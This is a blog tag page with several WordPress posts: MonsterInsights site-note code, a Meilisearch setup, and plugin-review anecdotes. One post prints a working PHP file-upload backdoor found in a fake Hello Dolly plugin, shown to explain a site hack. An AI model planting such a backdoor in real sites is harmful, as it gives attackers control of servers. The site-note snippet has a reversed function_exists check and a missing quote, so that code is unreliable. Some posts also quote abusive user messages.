Half-Elf on Tech

Thoughts From a Professional Lesbian

Tag: plugins

  • Monstrous Site Notes

    Monstrous Site Notes

    If you have a MonsterInsights Pro or Agency, you have access to Site Notes.

    They’re a great way to automagically connect your traffic reports to ‘things’ you’ve done on your site. The problem is that Site Notes are, by default, manual. To automate them, you need yet another plugin.

    Now to a degree, this makes sense. While the out of the box code is pretty clearcut, there’s one ‘catch’ and its categories.

    The Basic Call

    The actual code to make a note is pretty simple:

    		$note_args  = array(
    			'note'        => 'Title,
    			'author_id'   => 'author,
    			'date'        => 'date',
    			'category_id' => 1, // Where 1 is a category ID
    			'important'   => [true|false],
    		);
    
    		monsterinsights_add_site_note( $note_args );
    

    But as I mentioned, category_id is the catch. There isn’t actually an interface to know what those IDs are. The automator tools hook in and set that up for you

    Thankfully I know CLI commands and I can get a list:

    $ wp term list monsterinsights_note_category
    +---------+------------------+-----------------+-----------------+-------------+--------+-------+
    | term_id | term_taxonomy_id | name            | slug            | description | parent | count |
    +---------+------------------+-----------------+-----------------+-------------+--------+-------+
    | 850     | 850              | Blog Post       | blog-post       |             | 0      | 0     |
    | 851     | 851              | Promotion       | promotion       |             | 0      | 0     |
    | 849     | 849              | Website Updates | website-updates |             | 0      | 0     |
    +---------+------------------+-----------------+-----------------+-------------+--------+-------+
    

    But I don’t want to hardcode the IDs in.

    There are a couple ways around this, thankfully. WordPress has a function called get_term_id() which lets you search by the slug, name, or ID. Since the list of categories shows the names, I can grab them!

    A list of the categories for site notes.
    Screenshot of Site Notes Categories page.

    That means I can get the term ID like this:

     $term = get_term_by( 'name', 'Blog Post', 'monsterinsights_note_category' );
    

    Now the gotcha here? You can’t rename them or you break your code.

    Example for New Posts

    Okay so here’s how it looks for a new post:

    add_action( 'publish_post', 'create_site_note_on_post_publish', 10, 2 );
    
    function create_site_note_on_post_publish( $post_ID, $post ) {
        if ( function_exists( 'monsterinsights_add_site_note' ) ) {
            return;
        }
    
        if ( $post->post_type !== 'post' ) {
            return;
        }
    
        $post_title = $post->post_title;
        $term       = get_term_by( 'name', 'Blog Post', 'monsterinsights_note_category' );
    
        // Prepare the site note arguments
        $args = array(
            'note'        => 'New Post: ' . sanitize_text_field(   $post_title  ),
            'author_id'   => $post->post_author,
            'date'        => $post->post_date,
            'category_id' => $term->term_id,
            'important'   => false
        );
    
        monsterinsights_add_site_note( $args );
    }
    

    See? Pretty quick.

  • Meilisearch at Home

    Meilisearch at Home

    There are things most CMS tools are great at, and then there are things they suck at. Universally? They all suck at search when you get to scale.

    This is not really true fault of the CMS (be it WordPress, Drupal, Hugo, etc). The problem is search is difficult to build! If it was easy, everyone would do it. The whole reason Google rose to dominance was that it made search easy and reliable. And that’s great, but not everyone is okay with relying on 3rd party services.

    I’ve used ElasticSearch (too clunky to run, a pain to customize), Lunr (decent for static sites), and even integrated Yahoo and Google searches. They all have issues.

    Recently I was building out a search tool for a private (read: internal, no access if you’re not ‘us’) service, and I was asked to do it with MeiliSearch. It was new to me. As I installed and configured it, I thought … “This could be a nice solution.”

    Build Your Instance

    When you read the directions, you’ll notice they want to install the app as root, meaning it would be one install. And that sounds okay until you start thinking about multiple servers using one instance (for example, WordPress Multisite) where you don’t want to cross contaminate your results. Wouldn’t want posts from Ipstenu.org and Woody.com showing up on HalfElf, and all.

    There are a couple of ways around that, Multi-Tenancy and multiple Indexes. I went with the indexes for now, but I’m sure I’ll want tenancy later.

    I’m doing all this on DreamHost, because I love those weirdos, but there are pre-built images on DigitalOcean if that floats your goat:

    1. Make a dedicated server or a DreamCompute (I used the latter) – you need root access
    2. Set the server to Nginx with the latest PHP – this will allow you to make a proxy later
    3. Add your ssh key from ~/.ssh/id_rsa.pub to your SSH keys – this will let you log in root (or an account with root access)

    Did that? Great! The actual installation is pretty easy, you can just follow the directions down the line.

    Integration with WordPress

    The first one I integrated with was WordPress and for that I used Yuto.

    It’s incredibly straightforward to set up. Get your URL and your Master Key. Plunk them in. Save. Congratulations!

    On the Indices page I originally set my UIDs to ipstenu_posts and ipstenu_pages – to prevent collisions. But then I realized… I wanted the whole site on there, so I made them both ipstenu_org

    Example of Yuto's search output
    Yuto Screenshot

    I would like to change the “Ipstenu_org” flag, like ‘If there’s only one Index, don’t show the name’ and then a way to customize it.

    I will note, there’s a ‘bug’ in Yuto – it has to load all your posts into a cache before it will index them, and that’s problematic if you have a massive amount of posts, or if you have anti-abuse tools that block long actions like that. I made a quick WP-CLI command.

    WP-CLI Command

    The command I made is incredibly simple: wp ipstenu yuto build-index posts

    The code is fast, too. It took under a minute for over 1000 posts.

    After I made it, I shared it with the creators of Yuto, and their next release includes a version of it.

    Multiple Indexes and Tenants

    You’ll notice that I have two indexes. This is due to how the plugin works, making an index per post type. In so far as my ipstenu.org sites go, I don’t mind having them all share a tenant. After all, they’re all on a server together.

    However… This server will also house a Hugo site and my other WP site. What to do?

    The first thing I did was I made a couple more API keys! They have read-write access to a specific index (the Key for “Ipstenu” has access to my ipstenu_org index and so on). That lets me manage things a lot more easily and securely.

    While Yuto will make the index, it cannot make custom keys, so I used the API:

    curl \
    -X POST 'https://example.com/keys' \
    -H 'Authorization: Bearer BEARERKEY' \
    -H 'Content-Type: application/json' \
    --data-binary '{
    "description": "Ipstenu.org",
    "actions": ["*"],
    "indexes": ["ipstenu_org"],
    "expiresAt": null
    }'
    

    That returns a JSON string with (among other things) a key that you can use in WordPress.

    Will I look into Tenancy? Maybe. Haven’t decided yet. For now, separate indexes works for me.

  • Plugins: If I Did It…

    Plugins: If I Did It…

    Joe Co. (not their real name) had a bad day. It started when we emailed them this:

    Your plugins have been closed and your account on WordPress.org is suspended indefinitely for egregious guideline violations.

    Normally we send out warning notices to encourage developers to correct behaviour, however in certain cases there are events that cause us to have to take extreme action.

    We received a notice that you had been demanding users edit their reviews and comments in order to receive a refund from your product.

    Your employee fake@example.com said this:

    > Please kindly delete all the comment on Wordpress.org,
    >
    > After that, we will accept your refund request via PayPal

    And then they would provide links to screenshots of what to remove.

    There’s an ugly word for asking people to modify reviews for a reward: bribery.

    However asking users to modify a review and delete comments to get a refund is called EXTORTION […]

    If you’ve been reading for a while, you know how much I hate bribery and extortion.

    Time for Proof

    Joe Co. emailed back

    It’s not a nice day today for our company to receive your email on our
    account suspension, but we understand your concern to protect Org’s plugins
    directory. We respect that!

    However, in case like this, you did receive the feedback from one side and
    I believe that you should take times to reviceved the feedback from our
    company also. And we want you to know that maybe you should protect us and
    our company from UNFAIR COMPETIOR.

    Yes we internally thinks that this is among our Competitor doing
    something to get our Copies of Products and Try to Down us from the
    Directory, here is the reason and proof:

    Now, I can’t list the rest of that for reasons regarding anonymity, but I can summarize the proof:

    1. A PDF of their internal chat client with the person who they felt probably complained (it wasn’t that person)
    2. A PDF where the same person refused to let Joe Co. log into their site (reasonable!)
    3. An admission they handled it badly

    When I opened the first PDF I started laughing.

    Wanna know what it says?

    Important part: But you sent too much spam on our ticket support, our forum and Wordpress.org so we decided to give you a refund under the condition that you delete all your bad comments to avoid your spam review affect to our company's reputation. If you cannot delete all then it's meaningless.

    The kicker? That arrow and red box is from the PDF Joe Co. sent.

    Right there, they are agreeing they told the user that they would only give him a refund if he deleted the reviews. They were not spam, either, the person left one, single, solitary review.

    Who was wrong?

    Both Joe Co. and their user were in the wrong here.

    The user knew damn well they weren’t getting a refund, and in fact I told him he was being silly for complaining that there was no refund when the terms he agreed to say no refunds.

    Joe Co. should have stuck by their guns and not suggested that would give a refund at all.

    Of course, what Joe Co. did after that made it so much worse… Sockpuppets. Sockpuppets everywhere. 100% of their reviews on one plugin were faked. My buddy who cleans that up sobbed into his coffee and I think that was when he wrote a ‘close all’ script.

    Then they made two more accounts and resubmitted plugins and did it all again.

    So while I will grant you that the user was an idiot, Joe Co. was worse.

    Do You Refund?

    Regardless of if you provide refunds or not, the lesson here is “stick to your guns” folks. If the policy is “No Refunds” then suck it up, buttercup. If the policy is to provide a refund within X days, then you do that. If the company has no refund policy, then don’t buy from them, because you will get jerked around.

  • Plugins: It’s the Wild Wild West

    Plugins: It’s the Wild Wild West

    The email subject was really funny to me.

    PLEASE, save from the lawlessness!!!

    They’re guidelines but sure. Yogi Bear here (whose real username implied he was smarter than everyone) went on to complain that developers ignore him and forum mods removed his posts complaining about said developers.

    At WordPress.Org forums there is chaos and lawlessness from some moderators and deception from developers!!!

    I work about month on improving and problem resolving and translation of huge plugin [redacted] but after I send my work to developer – they just start to ignore me and did not fulfill their promises! 

    I create thread at forum about it, but some idiot arbitrariness moderator [redacted] just delete my thread with my asking for a help! 

    It’s like if police will just kill people that turned to them for help!!! It’s a total absurd!!!

    A little hyperbolic, but sure, I get the annoyance.

    All Mods are Bad Mods

    Taking a look, it was clear what happened. Yogi Bear here had made a forum post about “WARNING! Deception from developers!”

    The plugin in question offered free premium versions of their plugin in return for help making translations. In so far as bribery goes, I considered this to be a decent trade. The offer only existed on their website, you had to go find it, and it was a very clear “Work for us and be rewarded.” It didn’t, at the time, violate any guidelines.

    Yogi Bear made a translation and sent it in. Then he spent weeks finding every security bug he could on the plugin and sent that in.

    But after I sent it – developers just stop answer to my letters (already about month) without any explanations and apology.

    […]

    Therefore I WARNING all who want to translate [redacted] or negotiate with developers of [redacted] also known as [redacted] – all your work can be just taken without any promised gratitude!!! Dont work with [redacted] and [redacted] developers – they are deceivers!!!

    Ugh.

    While I will concede that ghosting someone with good intentions is a dick move, there was no contract between Yogi Bear and them, so while they should publicly credit him, they don’t have to. Also they didn’t use most of his fixes (I learned that much later).

    One of the forum Mods replied that you don’t have to submit a translation to them directly (which is true). What that Mod didn’t know was that Yogi Bear was looking for the compensation that comes when your translation via WP.org is accepted.

    Thing is … Yogi Bear’s translation was accepted (and he was rewarded). But still he saw three major issues:

    1. The translated country list, on the English page, was in … English
    2. The plugin used too many similar phrases (“Please confirm” vs “Are you sure?”)
    3. Due to 2, there’s too much reworking to do here

    Issue one was just someone not understanding what he was looking at. The second I agree is annoying, but honesty if that creates number three, then … don’t volunteer.

    The plugin dev replied that they 100% had sent him the reward, but did not agree to his ‘extra’ conditions. This devolved into a “Yes I did!” “No you did not!” shouting match. Yogi Bear had screenshots saying he didn’t get anything (no attachments), Plugin had screenshots with links to where he could download (and his replies).

    After a back and forth, the Mods sighed and closed the thread. Shortly thereafter, Yogi Bear complained to Plugin Review.

    As Expected, It Escalated

    Well.

    Looking into it, it was obvious Yogi Bear had been asked to stop calling people names (everyone was a liar or a cheat). The Mods had warned him, twice, so Plugins pointed out he was the one breaking rules at that point. However! Plugins was happy to listen to this complaint if he had actual evidence of a violation to the forum or plugin guidelines.

    so fucking tide of all of you – idiots, irresponsible scums, liars, lazybones, etc…

    Are you an idiot?

    I repeat – ARE YOU AN IDIOT?

    Because obvious answer is – yes, you are an idiot for sure, I have to explain to you what you can’t understand with your stupid mind…

    1) Where you find that I ignored any requests form moderators?! It’s a total LIE! I don’t receive any requests, just my threads was deleted now by idiot [Mod 1] and previously by the same kind of arrogant idiot [Mod 2]. You cannot blame me that I ignore something because I don’t get any request at all!!!

    2) What do you think – for what purpose WORDPRESS PLUGINS SUPPORT FORUM are exist?! I don’t even talk about super low level of help at those forums by your team and mass closing not resolved questions… but particularly at this situation – It’s most obvious function of especially your forum is to WARN OTHERS about some developer dishonest and deception behavior at their forum part! It’s most obvious action to ask WP.org community to help! It’s most obvious action to ask moderator FOR HELP!

    3) Publishing all this at my personal blog will not give any results. You must smarten up and grow up and take responsibility of such conflicts resolving, of WP users protection, etc – BUT NOT TO brainless delete their asking of help for sure!!!

    4) Just read deleted thread – there are full of EVIDENCE – I help to [plugin] with more than 100!! Bug resolving, some fundamental problems resolving, many suggestions of improvements, etc – it’s a HUGE and respectable work that just was taken by dishonest developers! If it’s a normally for you, if you don’t feel that WP.org PLUGINS SUPPORT FORUM M_U_S_T protect users from dishonest developers and lawlessness moderator – you better just go and kill yourself.

    So to be clear here, none of his complaints were about the plugin (I was kind of hoping he’d share the security issues since I didn’t see anything serious), and all were that the Mods told him to stop being a dick, and he said no. Per usual, this was replied with a reminder that Yogi Bear was emailing the plugin review team and we did not overrule forum moderators unless it was a valid issue with the plugin.

    The issue was Yogi Bear hating the plugin developers.

    Not our circus, not our monkeys (unless the plugin devs retaliated, which they did not — though we did caution them about sharing screenshots of emails in public).

    Yogi Bear shouted that we were idiots, again, and:

    If you are only “plugin bugs fixing team” – you must NOT judge me and my threads at forum.

    1. Plugin REVIEW team, for fuck’s sake!
    2. We weren’t judging, we were saying the Mods did their job and we didn’t override them

    Okay, I was absolutely judging him. And I agreed with the Mods here.

    Yogi Bear was directed to Slack.

    He never went.

    What Happens if The Dev is a Dick?

    That’s a valid question! The answer sucks.

    Let’s say Yogi Bear was right and his translation was accepted (easily verifiable) but he did not get any reward as promised (harder to verify, but assume we could), then … WordPress.org is not the place to rant.

    See, that’s an agreement between Yogi Bear and the plugin developers. It’s a causal, kinda verbal, agreement, and if they don’t meet their end … Er … Well. Sucks? Go to social media?

    Now, if you look back you can see Yogi Bear kind of understood that WP.org wasn’t the place, but he wouldn’t get traction anywhere else. And I really do feel for him there. But if you go to a place, rant, and are told “Hey man, this is not the place where you can just rant about these casual deals gone wrong” and you decide to do it anyway?

    Right.

    If a dev is a dick but didn’t violate guidelines, post about it on your blog, stop using their plugins, and let ’em rot. But that’s really all you can do. A lot of assholes make great plugins, and a lot of them are really not pleasant to work with. Unless they’re breaking the rules of the sites they’re on, you vote with your dollar and nothing more.

    For Yogi Bear here, he did all this to himself.

    1. He 100% got the code he was ‘owed’
    2. The plugin dev had no obligation to work with Yogi Bear on the security issues
    3. He never reported the security issues to WP.Org
    4. He intentionally, purposefully, and willfully ignored the reasonable ask of the Forum Mods to stop being a dick

    In the words of Jeff Probst, I got nothing for you.

  • Plugins: Fake Plugins Are Your Fault

    Plugins: Fake Plugins Are Your Fault

    Han (not his real name) emailed the plugin team to complain he was suspended by the forums team.

    […]

    But sometime in the last 12 months I had several sites attacked in which a Fake version of the Hello Dolly plugin was installed maliciously.

    Sadly as my post was deleted without warning or explanation any further details I could have given on the subject where lost along with the post.

    Now. Someone did reply to Han and told him that the fake plugin meant he had a vulnerability on his site, and here’s how you can look into that. Since his forum post included a code snippet, yes, it was removed after he was emailed about it.

    If it’s not hosted here, we don’t care

    That was, more or less, my mantra. It’s wrong, I very much do care, but I cannot do a blessed thing about other people’s sites.

    Still, we looked at the thread, and I was amused by the code:

    if(isset($_REQUEST['act'])){
        echo '<b>'.php_uname().'</b><br>';
        echo @file_get_contents('/location/server/version').'<br />';
        echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
        echo '<input name="uploadto" type="text" size="80" value="'.getcwd().'"><br />';
        echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
        if( $_POST['_upl'] == "Upload" ) {
    	    if(@copy($_FILES['file']['tmp_name'], $_POST['uploadto'].'/'.$_FILES['file']['name'])) {
    		    echo '<b>Upload success!</b><br>'.$_POST['uploadto']."/".$_FILES['file']['name']; 
    	    } else { 
    		    echo '<b>Upload failed!</b>'; 
    	    }
        }
        exit;
    }
    

    We replied that the code Han found on his server was not hosted on WordPress.org and, therefore, we could do nothing about it, here’s how you clean up your hacked site.

    You’re reporting that your sites have a vulnerability and someone is exploiting them. That they happen to use Hello Dolly to hide their malicious code is not something we could prevent. All we can tell you is that something on your sites is insecure and being used as a back door.

    Han disagreed:

    No the plugin was faking being hello dolly i don’t use it that’s how it was discovered. It installed itself and pretended to be hello dolly so yeah your problem coz it’s pretending to be one of your plugins

    That’s not how it works. I get why Han thought that, and in a way, it is a problem but … what can we do about it?

    1. We don’t know where the hack is from
    2. The hacker could have faked any plugin
    3. Of fucking course they’d fake a well known one people might ignore

    I’d love to be able to stop people from faking plugins, but there’s no way to even try.

    Fix Your Site

    We tried again:

    I’m sorry but you are incorrect in your understanding.

    The problem is not the Fake Hello Dolly, the problem is SOMETHING ELSE on your sites is vulnerable and that is being used by evil people to install the fake plugin.

    They could have named the fake plugin anything. They picked Hello Dolly because it’s common, but there’s nothing anyone can do to make them pick another name.

    There’s nothing we can do to help you here.

    Stop looking at the fake plugin as the source of your trouble and figure out what OTHER plugin or theme LET IT get installed.

    Or hire a security company to help you.

    Because you see the real issue is his sites keep getting hacked. So y’know, fix yourself.

    Or don’t you think it worth warning users to be aware of a threat that is branding itself as a WordPress product?

    I’m not asking you to fix anything. Im talking about something I found while patching security on someone else’s site sure they could have named it anything. But the code and everything about it was disguised to look a lot like Hello Dolly. All i wanted was to make someone aware but fine. Thanks I’ll know not to bother trying to help the community next time

    I see we’ve jumped over to ‘you won’t do what I want so I won’t ever help again’ — a common refrain.

    WordPress.org cannot stop people from being assholes

    So we tried again

    We understand what you’re trying to do. The reality is that there’s nothing we can do about this.

    It’s like people selling a fake Rolex watch. If we knew who it was, we could attempt to stop them. But knowing that it happens ‘somewhere’ out there and that someone fell for it? Well… we’re sorry and it sucks, but there’s nothing we can do about it.

    Someone made a fake Hello Dolly and hid bad code in it. They could have picked any plugin, even Yoast SEO, but even then Yoast would tell you there’s nothing they can do either.

    Of course Dolly was targeted. It’s on every single install. It’s like targeting Safari on a Mac. Ever Mac has it. It’s there. It’s used. Target it.

    All you’ve done here is tell us “Hey someone made a fake plugin and hid stuff in it.”

    Thank you, but there’s nothing we can do to stop it, and there’s nothing we can do to help people because the real issue isn’t whose plugin was faked, but how did that get installed in the first place. And that’s the job of a site security team.

    Unless the fake plugin is being distributed by WordPress.org, or the vulnerability that allowed it to be installed is in a plugin hosted on WordPress.org, this is outside our purview and we cannot assist you.

    At that point, Han accepted the point, but bitched we weren’t super kind at the start.

    Now here’s where it gets funny.

    Han claimed he never got the emails from the forums team, except he did. We know he did because he quoted one in his first email! So, since we knew he’d already been told things (like the plugin team cannot help you on code hosted outside of WordPress.org), we’d skipped that at the start of his email and that pissed him off.

    When this was pointed out, he claimed (again) to have not gotten the emails and didn’t know what to do. So we directed him to Slack and he opted to … not.

    Points to Remember?

    If a plugin is ‘hacked’ it’s likely a different plugin causing it and you can check because all the code on WordPress.org is open source and free to view. You can go look and say “Hmm. my copy of Hello Dolly doesn’t match!” That means the issue is not with the code hosted on WordPress.org, it’s something else!

    If it’s code you bought elsewhere, again, don’t complain to the Plugin Review Team, they can’t do jack.

    If it’s code you got from a nulled site, well you’re an idiot and don’t do that again.

  • Plugins: Do Better

    Plugins: Do Better

    Gazzer (not his real name) had a somewhat decent point to make. He emailed plugins to complain about security:

    You guys (WP) should do a better job of screening and/or even certifying the plugins that are listed in your directory. 

    I’m constantly receiving emails warning of security vulnerabilities associated with plugins. 

    Also, I’m spending way too much time dealing with plugins that wreak havoc with my site (using up server resources, and carrying viruses). 

    Maybe, you can experiment with a premium or “paid” plugin model.

    If Apple can do it with apps. then you guys can do it with plugins.

    Gazzer’s email

    This is a pretty common complaint. And it comes from a misconception I fully understand.

    We Don’t Do That

    The Plugin Review Team does not review every single release of every plugin. Considering the magnitude of the backlog today (over 400 and climbing) I think you all can see why.

    Reviewing a plugin takes time and it takes work and, if you’ve been reading this blog for a while, it takes mental fortitude not to scream “Just fucking enqueue your goddamn javascript you moron!” all the time.

    Ahem.

    I know that (at least at one point in time) the Theme Review Team did in fact review every release of every theme. I have often said that can work with themes because at their heart, they’re easier. Themes are themes. They ‘do’ the same thing in different ways.

    Plugins can be anything, do anything, and do it in any way possible. That divide id bigger than the Grand Canyon.

    We don’t screen or certify the plugins at all. 

    We review new plugins when they are created, and advise authors about problems before hand. However, there are 1000+ updates to plugins every single day. We do not have anywhere near the manpower to review every single change.

    We are a hosting service. We host the plugins for authors. We do not verify them, we do not create them, and we do not own them. Each plugin is owned by its authors, and they are responsible for it.

    Plugin Team reply

    Gazzer didn’t like that.

    Try a Plugin Store!

    Gazzer felt we should address his suggestion and try a store.

    Obviously, it easier to point out what you DON’T do as compared to looking at my suggestion and addressing it.

    I mentioned, “Maybe, you can experiment with a premium or “paid” plugin model.”

    Security vulnerabilities and poorly designed plugins are a major problem for some of us. Besides, if you create revenue from charging developers for plugins that some of us would be willing to pay for (especially certified for security and reliability) then it’s a win, win. However, if it’s easier to talk about what you can’t do or won’t do then nevermind. 

    I’ll continue to look elsewhere.

    So we pointed out:

    1. Plugin Review is a 100% volunteer org, no one gets paid
    2. Even CodeCanyon, who does have a paid/premium library doesn’t check every release
    3. No plans to do premium at this time (circa pre-Covid)

    The plan hasn’t changed. If if does, I would agitate for backpay for a decade of service, though.

    And By The Way …

    Instead of complaining about that anymore, Gazzer went on to vent about (checks notes) updates!

    Speaking of plugin and WP issues.. (see the screenshot).

    Why should I have to deal with the unknown consequences of this crap! Below:

    Screenshot of an alert saying a new Woo version is coming out, and all his plugins didn't have tested-up-to values that matched
    WTF!

    What the fuck is your plugin add-ons aren’t tested up to the latest version of WooCommerce and might conflict, and Woo is kindly warning you.

    Since we couldn’t figure out what was bad about that, we shrugged and didn’t reply. Gazzer sent a second reply with the exact same email, and we filed it away as well.

    Gaz can probably be UN-banned

    Of note, I think we could (and likely should if it hasn’t already) remove Gazzer’s ban. He was banned for simply not accepting the reality of life. If all you’re going to do is tell someone they’re wrong, over and over, they will stop listening to you. But in retrospect that’s a bit harsh.

    At the same time, he doesn’t seem to care and has ‘moved on.’ In fact, he nuked his account and his Slack account.

    Now.

    Should WordPress.org have a paid/premium service? No. Absolutely not. That would ruin a lot of things, and reviews would become a play for money instead of fixing the internet.

    Should someone have a service where they review plugins and give security reviews? A few exist, but one is a total asshole, three were bought out by major players, one thinks FUD sells better than actual checks, and the last one is Patchstack whom I love.